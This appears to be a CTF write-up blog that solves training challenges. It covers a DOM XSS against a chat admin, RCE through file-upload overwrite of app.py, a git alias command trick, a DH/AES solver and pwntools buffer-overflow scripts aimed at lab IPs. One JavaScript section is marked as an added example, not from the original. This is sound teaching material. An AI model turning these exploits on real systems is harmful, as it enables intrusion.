Tritium

I am still a newbie.

Writeups for the interesting newbie CTF challenges.

web

babyjvav

https://www.tritium.work/2023/11/06/Java Pitfalls for Beginners/

secchat

There is a DOM XSS vulnerability here: user-controlled input is written to innerHTML. It can be triggered with an svg tag or with the onerror attribute of an img tag.

Note that when a chat is initiated, the id is passed to the message function. So an XSS payload placed in the id and sent to the admin executes in the admin's context, where the page's own functions can be called to control the admin's behavior.

I want to score 500 in the snow

I think this question is very low-level.

const daxue = new Proxy({
    "math": "150",
    "computer": new String("150"),
    "politics": 98,
    "english": 100,
    "flag": 0,
    value: 500
}, {
    get: function (target, prop, receiver) {
        // Each read of 'politics' returns the current value and bumps it by one until it reaches 100
        if (prop === 'politics') {
            if (target.politics !== 100) {
                return target.politics++;
            } else {
                return target.politics;
            }
        }
        // Coercing the object to a number (==, +, etc.) goes through valueOf and always yields 500
        if (prop === "valueOf") {
            return function () {
                return target.value;
            };
        }
        // 'english' reports 100 on the first read (and increments past it), then "99" on every later read
        if (prop === 'english') {
            if (target.english !== 100) {
                return "99";
            } else {
                return target.english++;
            }
        }
        return Reflect.get(target, prop, receiver);
    }
});
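The Proxy works because the checker reads the same property more than once. As an added example (not from the original writeup; the two verifiers are hypothetical, since the challenge's own check is not shown on the page), here is a condensed form of that Proxy run against a check-then-use verifier it fools and a snapshot-based verifier it cannot:

```javascript
// Condensed version of the writeup's Proxy (constructed here): 'politics' answers
// 99 on the first read and 100 afterwards, and valueOf() always reports 500.
function makeScores(math = "150") {
  const t = { math, politics: 99, english: 100, value: 500 };
  return new Proxy(t, {
    get(target, prop, receiver) {
      if (prop === "politics") return target.politics < 100 ? target.politics++ : target.politics;
      if (prop === "valueOf") return () => target.value;
      return Reflect.get(target, prop, receiver);
    },
  });
}

// Hypothetical check-then-use verifier. Every property access is a separate call
// into the handler, so the value it gated on is not the value it records.
// Returns the recorded politics score, or null if a gate rejected the input.
function naiveRecord(scores) {
  if (scores.politics >= 100) return null;   // 1st read: 99, gate passes
  if (scores != 500) return null;            // loose == coerces via valueOf() -> 500
  return scores.politics;                    // 2nd read: 100
}

// Hardened verifier: read each field exactly once, require a primitive integer in
// [0, 100], and compute everything from that snapshot. The object itself is never
// coerced, so a custom valueOf() has no influence.
function hardenedRecord(scores) {
  const snap = {};
  for (const s of ["math", "politics", "english"]) {
    const v = scores[s];                     // exactly one handler invocation per field
    if (!Number.isInteger(v) || v < 0 || v > 100) return null;  // rejects "150" and String objects
    snap[s] = v;
  }
  snap.total = snap.math + snap.politics + snap.english;
  return snap;
}
```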

My new flask

Use the arbitrary file upload to overwrite /src/app.py and add a malicious route; that gives remote code execution (RCE).

misc

Snow Tree Saw Structure

This question tests a rarely used feature of the git shell.

git -c alias.test='!/readflag' test

A git alias whose value starts with ! runs an external command, which is how /readflag gets executed.

Memory Forensics

Use Volatility (vol) to list the processes, dump backdoor.exe, and read it.

What was before 3G

I wanted to test information theory, but there must be a detour in the CTF environment.

from pwn import *

# Answer each of the 15 "Ask Shannon" prompts with 1, then guess that every chest is a 1.
# If the guess is wrong, drop the connection and try again with a fresh instance.
while True:
    r = remote("172.20.14.117", 53001)
    for i in range(15):
        print(r.recvuntil(b"Ask Shannon:\n[-] "))
        r.sendline(b"1")
    r.recvuntil(b"Now open the chests:\n[-] ")
    r.sendline(b'1 1 1 1 1 1 1')
    res = r.recvline().decode()
    if "You've found all the treas" in res:
        print(res)
        break
    else:
        print("next")
        r.close()

With 7 chests there are only 128 possible cases, so the all-1s guess succeeds after a few attempts.

crypto

hard_pow

I couldn't understand the hashpumpy attack, so I used a simple substitution.

https://github.com/shellfeel/hash-ext-attack/tree/master

easy_pow

Just run brutehash to solve it, no need for a script.

Built for CTF: randomly generates or brute-forces hash values of a specified format, supporting fuzzing of common hash types such as the MD and SHA families.

easy_dhke

Everything has been leaked, so I stitched it into pwntools.

from Crypto.Util.number import long_to_bytes
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
from pwn import *

# p is a large prime number used for modulo operations in the Diffie-Hellman key exchange
p = 327824197795087630552811243153730025469
# g is the base used for generating public keys in the Diffie-Hellman key exchange
g = 5
# alice is Alice's private key, an integer chosen by Alice
alice = 22751
# bob is Bob's private key, an integer chosen by Bob
bob = 39494
# Bob calculates his public key as g^bob mod p and assigns it to Bob (uppercase to distinguish from private key)
Bob = pow(g, bob, p)
# The shared secret key is calculated by Alice using Bob's public key, raised to the power of Alice's private key mod p
key = long_to_bytes(pow(Bob, alice, p))


def encrypt(plain_text: bytes, key: bytes) -> bytes:
    cipher = AES.new(key, AES.MODE_ECB)
    cipher_text = cipher.encrypt(pad(plain_text, AES.block_size))
    return cipher_text


def decrypt(encrypt_text: bytes, key: bytes) -> bytes:
    cipher = AES.new(key, AES.MODE_ECB)
    plain_text = unpad(cipher.decrypt(encrypt_text), AES.block_size)
    return plain_text


r = remote('172.20.14.117',40766)
r.recvuntil(b'[+] Alice said :\n')
cipher = r.recvuntil(b'\n')[0:-1]
print(cipher)
message = decrypt(cipher, key)
print(message)
r.recvuntil(b"[+] Now tell me what are they talking about:")
r.sendline(message)
r.recvuntil(b"[+] Tell me the cipher:")
r.send(encrypt(b'HackedBy0xfa',key))
print(r.recvall())

easy_rsa

The n in this question is very simple: factorize it with factordb and you can decrypt.

leak_d

Since you already know d, just decrypt it.

I seem to have deleted the script.

pwn

right

I figured this out myself. It's the simplest ret2text from ctfwiki.

from pwn import *

context(os='linux', arch='amd64', log_level='debug')
r = remote("172.20.14.117", 28202)
addr = 0x40115A                      # address of the line that calls system
payload = flat([b'a' * 0x28, addr])  # 0x20 buffer + 8 bytes saved rbp, then the return address
r.recvuntil(b'so please tell me what you want to tell me\n')
r.sendline(payload)
r.interactive()

addr is the address of the line that calls system. The buffer sits at rbp-0x20, so 0x20 + 8 bytes of padding (the saved rbp) reach the return address and overwrite it.

onepiece

from pwn import *

io = remote("172.20.14.117", 61768)
addr = 0x40119e
# Long padding followed by the target address repeated many times,
# so the return address lands on it whatever the exact offset is
payload = b"a" * 0x100 + p64(addr) * 0x100
io.sendline(payload)
io.interactive()

I made it up. I can't understand blindpwn.
